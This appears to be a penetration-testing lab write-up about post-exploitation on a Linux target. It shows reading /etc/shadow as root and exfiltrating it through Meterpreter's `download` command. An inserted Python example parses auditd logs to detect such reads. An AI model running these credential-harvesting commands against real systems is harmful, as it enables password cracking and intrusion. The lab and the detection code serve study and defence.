Objective: To leverage administrative access to extract the system’s “Shadow” file, demonstrating the ability to harvest encrypted credentials for offline analysis.
1. The Post-Exploitation Phase
Once the initial shell was established on the target (192.168.56.101), the focus shifted to Data Exfiltration. In Linux environments, the most critical file for an attacker is /etc/shadow, which contains the encrypted password hashes for every user on the system.
2. Technical Challenges & Solutions
During the session, I encountered a platform-specific limitation where the standard Metasploit priv extension (designed for Windows) was unavailable for this Linux target. I successfully adapted by utilizing native Linux commands to bypass the tool’s limitations.
| Target File | Permission Required | Data Content |
|---|---|---|
| /etc/passwd | Read (All Users) | Usernames and UID information. |
| /etc/shadow | Root Only | Encrypted password hashes and salt. |
3. Execution Workflow
- Identity Verification: Confirmed administrative status by executing `whoami` (Result: `root`).
- Bypassing Tool Limitations: Instead of relying on automated “hashdump” scripts, I manually accessed the sensitive file structure.
- File Read & Capture: Used the `cat` command to display the contents of the shadow file directly in the terminal for manual capture.
- Secure Download: Utilized the Meterpreter `download` command to pull the file from the victim’s infrastructure to my local Kali workspace for evidence preservation.
4. Key Commands Used
- `getuid`: To verify the current session’s privilege level (User: 0 / Root).
- `cat /etc/shadow`: To read the encrypted password store.
- `download /etc/shadow /home/sophy/Desktop/shadow_loot.txt`: To exfiltrate the data to a secure local directory.
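On the defensive side, a direct read of /etc/shadow like the one above is recorded by auditd when a watch rule covers the file. The following is an added example, not part of the original write-up: it groups audit records by event and flags shadow-file reads by binaries outside an expected set. The rule key `shadow_read`, the allowlist and the sample records are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed auditd records (not from the original page); they assume a watch
# rule such as: -w /etc/shadow -p r -k shadow_read
SAMPLE_LOG = '''\
type=SYSCALL msg=audit(1700000000.101:501): arch=c000003e syscall=257 success=yes exit=3 pid=812 auid=4294967295 uid=0 comm="sshd" exe="/usr/sbin/sshd" key="shadow_read"
type=PATH msg=audit(1700000000.101:501): item=0 name="/etc/shadow" inode=131 nametype=NORMAL
type=SYSCALL msg=audit(1700000042.250:502): arch=c000003e syscall=257 success=yes exit=3 pid=2290 auid=4294967295 uid=0 comm="cat" exe="/usr/bin/cat" key="shadow_read"
type=PATH msg=audit(1700000042.250:502): item=0 name="/etc/shadow" inode=131 nametype=NORMAL
type=SYSCALL msg=audit(1700000050.007:503): arch=c000003e syscall=257 success=no exit=-13 pid=2301 auid=1000 uid=1000 comm="less" exe="/usr/bin/less" key="shadow_read"
type=PATH msg=audit(1700000050.007:503): item=0 name="/etc/shadow" inode=131 nametype=NORMAL
'''

# Assumed allowlist of binaries expected to read the shadow file; tune per host.
EXPECTED_READERS = {"/usr/sbin/sshd", "/usr/bin/sudo", "/usr/bin/passwd",
                    "/usr/sbin/unix_chkpwd", "/usr/bin/login"}

EVENT_ID = re.compile(r"msg=audit\(\d+\.\d+:(\d+)\)")
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_events(log_text):
    """Group audit records by event serial and merge their key=value fields."""
    events = defaultdict(dict)
    for line in log_text.splitlines():
        m = EVENT_ID.search(line)
        if not m:
            continue
        fields = {k: v.strip('"') for k, v in FIELD.findall(line)}
        rec_type = fields.pop("type", "")
        # PATH records carry the file name; SYSCALL records carry who and what.
        events[int(m.group(1))].update({f"{rec_type}.{k}": v for k, v in fields.items()})
    return events

def suspicious_shadow_reads(log_text, path="/etc/shadow"):
    """Return (serial, exe, uid, succeeded) for reads by unexpected binaries."""
    hits = []
    for serial, ev in sorted(parse_events(log_text).items()):
        exe = ev.get("SYSCALL.exe", "?")
        if ev.get("PATH.name") == path and exe not in EXPECTED_READERS:
            hits.append((serial, exe, int(ev.get("SYSCALL.uid", -1)),
                         ev.get("SYSCALL.success") == "yes"))
    return hits

if __name__ == "__main__":
    for hit in suspicious_shadow_reads(SAMPLE_LOG):
        print(hit)
```

A successful read by `uid=0` from a general-purpose binary such as `cat` is the pattern worth alerting on; failed attempts by unprivileged users are lower priority but still worth recording.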


5. Professional Impact
This project highlights a “Pivot-Mindset”—the ability to troubleshoot technical hurdles (like unsupported extensions) and still achieve the objective using core operating system knowledge. By successfully extracting the /etc/shadow file, I demonstrated the final stage of a system compromise: the theft of “Identities,” which could lead to further lateral movement across the entire corporate network.